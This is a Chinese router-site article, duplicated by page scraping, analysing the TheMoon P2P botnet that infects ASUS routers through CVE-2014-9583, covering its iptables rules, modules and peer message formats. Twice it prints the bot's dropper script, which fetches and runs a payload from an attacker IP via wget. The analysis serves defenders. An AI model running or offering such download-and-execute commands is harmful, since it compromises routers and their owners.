详解感染华硕路由器的P2P僵尸网络程序

摘要:很多电脑用户对于华硕路由器感染僵尸网络很迷茫,下面小编主要针对这个问题为大家讲解感染华硕路由器的P2P僵尸网络程序TheMoon,希望可以帮助到大家……

详情:

僵尸网络是指采用一种或多种传播手段,是指实现恶意控制功能的程序代码,在控制者和被感染主机之间所形成的一个可一对多控制的网络。

详解感染华硕路由器的P2P僵尸网络程序

下图是利用wireshark抓包捕获的僵尸程序攻击流量,可看出僵尸程序使用了CVE-2014-9583漏洞利用代码。

详解感染华硕路由器的P2P僵尸网络程序

CVE-2014-9583 :ASUS WRT是华硕(ASUS)公司的一个路由器固件。RT-AC66U、RT-N66U等多款路由器中使用的ASUS WRT的infosvr中的common.c文件中存在安全漏洞,该漏洞源于程序没有正确检查请求的MAC地址。远程攻击者可通过向UDP 9999端口发送NET_CMD_ID_MANU_CMD数据包利用该漏洞绕过身份验证,执行任意命令。详情参见GitHub

以下是bot从网站http://78.128.92.137:80/ 自动下载的nmlt1.sh文件内容

#!/bin/sh

cd /tmp

rm -f .nttpd

wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1

chmod +x .nttpd

./.nttpd

路由器将会从攻击者控制的网站上自动下载并执行.nttpd文件,.nttpd运行后将成为驻留进程。以下为.nttpd文件哈希信息

详解感染华硕路由器的P2P僵尸网络程序

该bot程序属于TheMoon恶意软件系列,程序结构如下:

详解感染华硕路由器的P2P僵尸网络程序

该bot程序主要不同在于os_init和 run_modules函数,os_init中插入了8个iptables规则:

详解感染华硕路由器的P2P僵尸网络程序

为了获得感染设备的绝对控制权,防止反复感染,其中第一条规则通过关闭端口9999,阻止其它攻击者利用华硕CVE-2014-9583漏洞;第二条规则是关闭多个端口,阻止其它攻击者利用D-Link的一个远程命令执行漏洞。其余为bot程序建立的网络通信规则。

在run_modules中,bot加载了3个模块:CLK 、NET、DWL,我们依次来做分析:

CLK模块

该模块加载了两个线程,一个用来计时,一个用来同步,它通过查询公开NTP服务器保持UTC时间。抓包发现bot与NTP服务器之间的请求回应流量

详解感染华硕路由器的P2P僵尸网络程序

Net模块

该模块开启了UDP 5143端口,并创建了一个P2P通信线程。值得注意的是,与通常的端口通信不同,该bot程序支持3种不特定的消息类型。

Register message

RegisterTo message

FetchCommand message

每种类型都包含相同的头结构:

Offset Size Description

0 1 Body length

1 1 Message Type

2 1 TTL

3 1 0x8F (variant specific)

当bot接收到消息时,TTL值以1递减,并把消息转发给其它对等结点(peer),下图为向其它peer节点转发消息的底层代码

详解感染华硕路由器的P2P僵尸网络程序
上一页12 下一页 阅读全文
以上内容由WiFi之家网整理收藏!详情:

Register message(注册消息)

该消息类型标记为0,当所有模块加载完毕,消息将被转发给其它对等网络,包括iptables规则中的其它网络:

详解感染华硕路由器的P2P僵尸网络程序

详解感染华硕路由器的P2P僵尸网络程序

详解感染华硕路由器的P2P僵尸网络程序

消息体由两个双字字符串组成,其中0x6d6163f4为特定变量,而00000xx为对等网络值。在转发完该消息类型之后,bot程序会自动把发送方添加为自身对等结点(peer),以此扩大传播感染面。

RegistertTo message(判断消息)

该消息类型标记也为0,但消息体为12个字节。如果第三个双字字符不为0,程序将会向特定IP发送register message消息进行注册。否则,将会向发送方持续请求register message,保持通信。下图为bot程序接收到的Register To消息流量包

详解感染华硕路由器的P2P僵尸网络程序

FetchCommand message (控制消息)

该消息类型标记为1,消息体结构如下:

Offset Size Description

0 4 Peer IP address

4 4 Command id

8 4 Command size (Maximum 0x19001)

12 n file name(n8)

以下为bot接收到的FetchCommand消息流量包

详解感染华硕路由器的P2P僵尸网络程序

之后,bot程序会把消息内容储存在Pending Command内为后续DWL模块使用:

Struct PendingCommand

{

DWORD ip;

DWORD cmd_id;

DWORD cmd_size;

CHAR filename[8];

};

DWL模块

该模块创建读取PendingCommand内容的进程,之后,程序通过TCP 4543端口向特定IP发送请求文件名和命令ID:

详解感染华硕路由器的P2P僵尸网络程序

特定IP返回请求文件,bot储存响应信息并执行文件。下图为请求执行过程的底层实现代码:

详解感染华硕路由器的P2P僵尸网络程序

总结

TheMoon恶意软件于2014年被SANS发现,主要以路由器为目标,利用漏洞植入感染。从底层代码来看,TheMoon还以华硕(ASUS)和 Linksys路由器为特定目标。通过分析可以看出,TheMoon使用iptables规则进行通信的P2P感染机制还不太成熟,另外,其不加密的通信可被轻易发现和分析。

以上就是WiFi之家网小编为大家讲解的感染华硕路由器的P2P僵尸网络程序的教程,需要的用户快来看看吧,想了解更多精彩教程请继续关注WiFi之家网网站!

推荐文章:

新型WiFi系统 MegaMIMO 2.0三倍速 解决信号差、上网慢问题

教你一招成功破解电信限制路由器,多台电脑一起上网速也一样快

上一页 1 2下一页阅读全文
以上内容由WiFi之家网整理收藏!详情:

僵尸网络是指采用一种或多种传播手段,是指实现恶意控制功能的程序代码,在控制者和被感染主机之间所形成的一个可一对多控制的网络。

详解感染华硕路由器的P2P僵尸网络程序

下图是利用wireshark抓包捕获的僵尸程序攻击流量,可看出僵尸程序使用了CVE-2014-9583漏洞利用代码。

详解感染华硕路由器的P2P僵尸网络程序

CVE-2014-9583 :ASUS WRT是华硕(ASUS)公司的一个路由器固件。RT-AC66U、RT-N66U等多款路由器中使用的ASUS WRT的infosvr中的common.c文件中存在安全漏洞,该漏洞源于程序没有正确检查请求的MAC地址。远程攻击者可通过向UDP 9999端口发送NET_CMD_ID_MANU_CMD数据包利用该漏洞绕过身份验证,执行任意命令。详情参见GitHub

以下是bot从网站http://78.128.92.137:80/ 自动下载的nmlt1.sh文件内容

#!/bin/sh

cd /tmp

rm -f .nttpd

wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1

chmod +x .nttpd

./.nttpd

路由器将会从攻击者控制的网站上自动下载并执行.nttpd文件,.nttpd运行后将成为驻留进程。以下为.nttpd文件哈希信息

详解感染华硕路由器的P2P僵尸网络程序

该bot程序属于TheMoon恶意软件系列,程序结构如下:

详解感染华硕路由器的P2P僵尸网络程序

该bot程序主要不同在于os_init和 run_modules函数,os_init中插入了8个iptables规则:

详解感染华硕路由器的P2P僵尸网络程序

为了获得感染设备的绝对控制权,防止反复感染,其中第一条规则通过关闭端口9999,阻止其它攻击者利用华硕CVE-2014-9583漏洞;第二条规则是关闭多个端口,阻止其它攻击者利用D-Link的一个远程命令执行漏洞。其余为bot程序建立的网络通信规则。

在run_modules中,bot加载了3个模块:CLK 、NET、DWL,我们依次来做分析:

CLK模块

该模块加载了两个线程,一个用来计时,一个用来同步,它通过查询公开NTP服务器保持UTC时间。抓包发现bot与NTP服务器之间的请求回应流量

详解感染华硕路由器的P2P僵尸网络程序

Net模块

该模块开启了UDP 5143端口,并创建了一个P2P通信线程。值得注意的是,与通常的端口通信不同,该bot程序支持3种不特定的消息类型。

Register message

RegisterTo message

FetchCommand message

每种类型都包含相同的头结构:

Offset Size Description

0 1 Body length

1 1 Message Type

2 1 TTL

3 1 0x8F (variant specific)

当bot接收到消息时,TTL值以1递减,并把消息转发给其它对等结点(peer),下图为向其它peer节点转发消息的底层代码

详解感染华硕路由器的P2P僵尸网络程序

Register message(注册消息)

该消息类型标记为0,当所有模块加载完毕,消息将被转发给其它对等网络,包括iptables规则中的其它网络:

详解感染华硕路由器的P2P僵尸网络程序

详解感染华硕路由器的P2P僵尸网络程序

详解感染华硕路由器的P2P僵尸网络程序

消息体由两个双字字符串组成,其中0x6d6163f4为特定变量,而00000xx为对等网络值。在转发完该消息类型之后,bot程序会自动把发送方添加为自身对等结点(peer),以此扩大传播感染面。

RegistertTo message(判断消息)

该消息类型标记也为0,但消息体为12个字节。如果第三个双字字符不为0,程序将会向特定IP发送register message消息进行注册。否则,将会向发送方持续请求register message,保持通信。下图为bot程序接收到的Register To消息流量包

详解感染华硕路由器的P2P僵尸网络程序

FetchCommand message (控制消息)

该消息类型标记为1,消息体结构如下:

Offset Size Description

0 4 Peer IP address

4 4 Command id

8 4 Command size (Maximum 0x19001)

12 n file name(n8)

以下为bot接收到的FetchCommand消息流量包

详解感染华硕路由器的P2P僵尸网络程序

之后,bot程序会把消息内容储存在Pending Command内为后续DWL模块使用:

Struct PendingCommand

{

DWORD ip;

DWORD cmd_id;

DWORD cmd_size;

CHAR filename[8];

};

DWL模块

该模块创建读取PendingCommand内容的进程,之后,程序通过TCP 4543端口向特定IP发送请求文件名和命令ID:

详解感染华硕路由器的P2P僵尸网络程序

特定IP返回请求文件,bot储存响应信息并执行文件。下图为请求执行过程的底层实现代码:

详解感染华硕路由器的P2P僵尸网络程序

总结

TheMoon恶意软件于2014年被SANS发现,主要以路由器为目标,利用漏洞植入感染。从底层代码来看,TheMoon还以华硕(ASUS)和 Linksys路由器为特定目标。通过分析可以看出,TheMoon使用iptables规则进行通信的P2P感染机制还不太成熟,另外,其不加密的通信可被轻易发现和分析。

以上就是WiFi之家网小编为大家讲解的感染华硕路由器的P2P僵尸网络程序的教程,需要的用户快来看看吧,想了解更多精彩教程请继续关注WiFi之家网网站!

推荐文章:

新型WiFi系统 MegaMIMO 2.0三倍速 解决信号差、上网慢问题

教你一招成功破解电信限制路由器,多台电脑一起上网速也一样快

以上内容由WiFi之家网整理收藏!

原创文章,作者:路由器,如若转载,请注明出处:https://www.224m.com/227798.html

(0)
路由器路由器
上一篇 2023年3月25日
下一篇 2023年3月25日

相关推荐

  • 华硕路由器设置地址是多少?

    很多初次使用华硕路由器的小白朋友们问小编:华硕无线路由器的默认登录地址是什么?对此,本文就为大家进行详细介绍。 问:华硕(ASUS)路由器设置网址是多少? 我家里的路由器是华硕的,这个路由器的后台地址默认是多少? 答:华硕(ASUS)路由器后台默认网址是: 192.168.

    2021年9月15日
  • 华硕路由器最新款测评(华硕今年新类路由器)

    为一个经常需要出差到处跑的人,我最讨厌的就是住酒店,诚然住酒店会有很多好处:停车方便,衣食住行不操心。但是涉及到个人化的需求的时候就很难受了,比如酒店的路由器和网速很渣这件事你就完…

    华硕路由器 2023年2月8日
  • router asus-华硕路由器怎么样.

    routerasus本文目录华硕路由器怎么样?k2p华硕路由器中文设置?华硕路由器如何关闭dhcp?华硕路由器如何设置网速最快?华硕无线路由器怎么设置上网?华硕路由器怎么样?华硕的路由器还是很不错的,购买的话要看你是玩游戏还是居家用,给你推荐一下。华硕推出专业手游路由RT-AC86U,立式机身

    2023年7月24日
  • rt-ax68u开箱测评(华硕rt-ax68u值得入手吗)

    PC设定路由器 52asus 接入电源线和网线,PC浏览器访问“router.asus.com”或192.168.50.1,可进入快速设定页面。 52asus 选择“创建新的网络”…

    2023年4月21日
  • ASUS路由器登录密码忘了怎么办?华硕路由器登录密码找回方法

    摘要:近日,有网友问小编:华硕路由器登录密码忘记了怎么办?如何找回ASUS路由器登录密码?针对这类问题,本文就为大家介绍华硕路由器登录密码的找回方法……

    2023年4月10日
  • mesh路由器推荐有线回程(mesh分布式路由器的优缺点)

    前段时间购入华为WS5200千兆路由,使用已经有段时间了,但效果差强人意,主要表现是信号覆盖差,房间与路由器只隔一堵墙,在房间刷个抖音都会卡顿,更别说玩游戏了;最气人是WiFi久久…

    华硕路由器 2022年11月14日
  • 华硕灵耀ax魔方测评(身材小巧玲珑,单手即可握)

    开箱体验 华硕灵耀AX魔方分布式Wi-Fi 6路由器开箱体验_新浪众测 包装左上角印有WiFi6″Logo”,中间为产品渲染图和产品名称,左下角印有最高可覆…

    华硕路由器 2022年11月2日
  • 灵耀ax6600评测(华硕ax6600设置160mhz)

    朋友最近刚接手了个咖啡馆,装修基本弄得七七八八了。 但朋友跟我提到,店内WiFi的体验不好,信号不好,速度慢。。。 作为技术宅的我,早就体验过各种MESH技术的路由器,遂推荐上ME…

    华硕路由器 2023年1月22日
  • 华硕路由器怎么设置?

    现在很多人都有不止一台移动网络设备,那么如何让它们能方便的接入家中的网络呢?这个时候就需要用到华硕无线路由器(其它路由器也可以哦),那么接下来的问题就是:华硕无线路由器怎么设置呢?下面本文就教大家轻松设置无线路由器,看看华硕无线路由器怎么设置,并将实

    2021年9月8日
  • 华硕路由器授权方式(快速解答授权方式)

    最好选网上在线授权,这样方便,不用再跑营业厅了,WPA3-Personal授权方式。部分ASUS路由器已经支持WPA3-Personal授权方式,以强化您的网络安全性。 当您欲启用…

    2023年4月5日